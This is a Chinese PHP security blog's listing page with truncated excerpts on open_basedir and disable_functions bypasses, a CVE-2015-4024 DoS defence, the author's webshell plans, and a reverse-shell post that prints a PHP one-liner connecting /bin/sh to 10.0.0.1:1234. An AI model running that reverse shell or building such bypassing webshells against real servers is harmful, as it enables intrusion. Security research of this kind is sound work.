php7 + nginx + mysql 安装小计

作者: 分类: PHP 时间: 2016-2-9 1:10 评论: 1条评论 浏览: 2650人看过 标签: php php7

【过年了,每天发一篇以前的存货,一共七篇。】

思路是,先用源,安装好php5和php5所依赖的所有项目,再安装phpbrew,通过phpbrew管理php版本,并安装7.0.0。
首先安装一些依赖

apt-get install gcc
apt-get install libmcrypt-dev libreadline-dev

安装php5所依赖的所有项目

apt-get build-dep php5-cli

其中还包括mysql,会让你输入mysql的root密码。
安装完成后,查看此时的php版本,发现是php5.6.14(debian8的系统,源也算新)

14501107090770.jpg

安装phpbrew (https://github.com/phpbrew/phpbrew)

curl -L -O https://github.com/phpbrew/phpbrew/raw/master/phpbrew
chmod +x phpbrew
sudo mv phpbrew /usr/local/bin/phpbrew
phpbrew init

好,实际上就是下载了phpbrew的可执行文件并放到PA...

阅读全文>>

PHP Multipart/form-data remote DOS 防御方案研究

作者: 分类: PHP 时间: 2015-5-21 23:25 评论: 11条评论 浏览: 3655人看过 标签: php 拒绝服务漏洞

    CVE-2015-4024漏洞,据发布时间过去了好几天,我来总结一下。

    这个的DOS漏洞炒得很火,百度安全攻防实验室的小伙伴也很给力。我个人认为漏洞的影响确实很大,毕竟对于一个web应用,拒绝服务攻击可以说是杀死它最简单的方法。这样大张旗鼓地说也很必要,也是一种加速杀死php 5.2/5.3的方式。

    前不久才说了要赶紧弃用php 5.2/5.3事情,这次出了这么大的漏洞,很多用5.3的同学就着急了,各种求5.3的patch。

    漏洞原理在drops的中文文章中(http://drops.wooyun.org/papers/6077)已经解释过了,是由于php没有妥善处理multipart/form-data请求的body part请求头,对于换行内容多次重新申请内存,导致耗尽CPU资源,拒绝服务计算机。

    其实在C语言里会常常遇到这种现象,当你不知道某个buffer究竟要申请多长空间时...

阅读全文>>

PHP绕过open_basedir列目录的研究

作者: 分类: PHP 时间: 2014-11-21 17:28 评论: 5条评论 浏览: 3908人看过 标签: 跨目录 open_basedir

    首发drops:http://drops.wooyun.org/tips/3978

    近期由于在开发自己的webshell,所以对PHP一些已有的漏洞进行了一定的研究,并且也自己发现了部分PHP存在的安全隐患。这篇文章我来与大家分享一下自己对于PHP中open_basedir绕过并列举目录的方法总结。


0x01 open_basedir的简介

    Open_basedir是PHP设置中为了防御PHP跨目录进行文件(目录)读写的方法,所有PHP中有关文件读、写的函数都会经过open_basedir的检查。Open_basedir实际上是一些目录的集合,在定义了open_basedir以后,php可以读写的文件、目录都将被限制在这些目录中。

    设置open_basedir的方法,在linux下,不同的目录由“:”分割,如“/var/www/:/tmp/”;在Windows下不同目录由“;”分割,如“c:/www;c:/wind...

阅读全文>>

PHP Execute Command Bypass Disable_functions

作者: 分类: PHP 时间: 2014-11-19 15:01 评论: 6条评论 浏览: 3915人看过 标签: disable_functions 破壳漏洞
先简单说一下php调用mail()函数的过程。 
看到源码ext/mail.c 

236行: 

char *sendmail_path = INI_STR("sendmail_path"); 
char *sendmail_cmd = NULL;


从INI中获得sendmail_path变量。我们看看php.ini里是怎么说明的: 


; For Unix only.  You may supply arguments as well (default: "sendmail -t -i"). 
;sendmail_path =
注释中可以看到,send_mail默认值为"sendmail -t -i". 

extra_cmd(用户传入的一些额外参数)存在的时候,调用spprintf将sendmail_path和extra_cmd组合成真正执行的命令行sendmail_cmd 。不存在则直接将sendmail_path赋值给sendmail_cmd 。 
如下: 
if (!send...


阅读全文>>

个人版php webshell的一些功能

作者: 分类: PHP 时间: 2014-10-28 23:03 评论: 6条评论 浏览: 4151人看过 标签: webshell php

    网上的webshell总结起来有一些缺陷:

    1.兼容性差,当某函数禁用后,该功能就不能用了。其实php是个很灵活的语言,很多功能是可以有很多实现方式的。

    2.功能单一,一般都只有常用的几个功能,不够好用。

    3.突破性不强,没用利用一些php、IIS、apache、nginx的CVE来达到一些特殊目的,比如绕过open_basedir、绕过安全模式等。

    4.别人写的自己不了解,维护起来不方便,免杀起来也不顺手。

    特别是第一点,和第二点,我想自己的webshell能够有更好的使用效果。webshell已经写了一半,除了常见功能。大概、我希望有如下一些比较好的:

    1.执行命令,囊括尽可能多的方法,和一些奇技淫巧

    2.获得内网IP,并能扫描内网端口

    3.利用...

阅读全文>>

php webshell下直接反弹shell(不借助任何其他语言)

作者: 分类: PHP 时间: 2014-10-27 18:43 评论: 2条评论 浏览: 5138人看过 标签: webshell 反弹shell

    linux下,有时候拿到webshell需要提权,提权必须要得到一个交互式的shell。

    我看了一下常用的php webshell,对于命令执行、反弹shell都没有完善的方式。很多webshell里都没有proc_popen、popen这两种方式,特别是proc_popen,比如phpspy。

    在我收集的反弹shell集合(http://tool.p1ng.pw/getshell.html)中,有一个方法,就是在命令行中输入:

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
    但是有个问题,如果在webshell里执行如上代码的话,会把系统的标准输入输出重定向到/bin/sh里,导致php-fpm直接502,然后弹的shell也会瞬间掉了,这个方式比较粗鲁。而我的思路是:我只希望把我新创建的进程(/b...


阅读全文>>

PHP对验证码的认证过程

作者: 分类: PHP 时间: 2013-7-31 22:02 评论: 6条评论 浏览: 4068人看过 标签: php 验证码

    这段时间在写php脚本,接触到web前端以及web安全问题比较多,这时给大家简单地谈一下我们网站验证码的验证过程及其安全问题。

    从三个方面去谈一下关于验证码的使用:验证码的生成,验证的过程,验证中注意的安全问题。

    验证码的生成,首先还是要说说验证码的作用。众所周知,验证码的存在,是为了防止一些机器,或是刷恶意留言、无限...

阅读全文>>

php遍历目录&删除指定文件中指定内容

作者: 分类: PHP 时间: 2013-2-26 16:44 评论: 6条评论 浏览: 72404人看过 标签: 文件操作 遍历目录 php

    现在正坐在安静的寝室里,寒假俨然已经离我而去了……今天发的是我寒假里搞的最后一次学习,之后的时间就一直在看海贼王了。

    以前写过一个C语言的遍历目录+复制文件的程序,很长很复杂,现在用PHP一样可以实现遍历目录,而代码就短了不少。这个程序目的是遍历目录,找到所有指定文件名的文件,并删除其中指定的字符串。

<?p...

阅读全文>>

Top ↑ sitemap More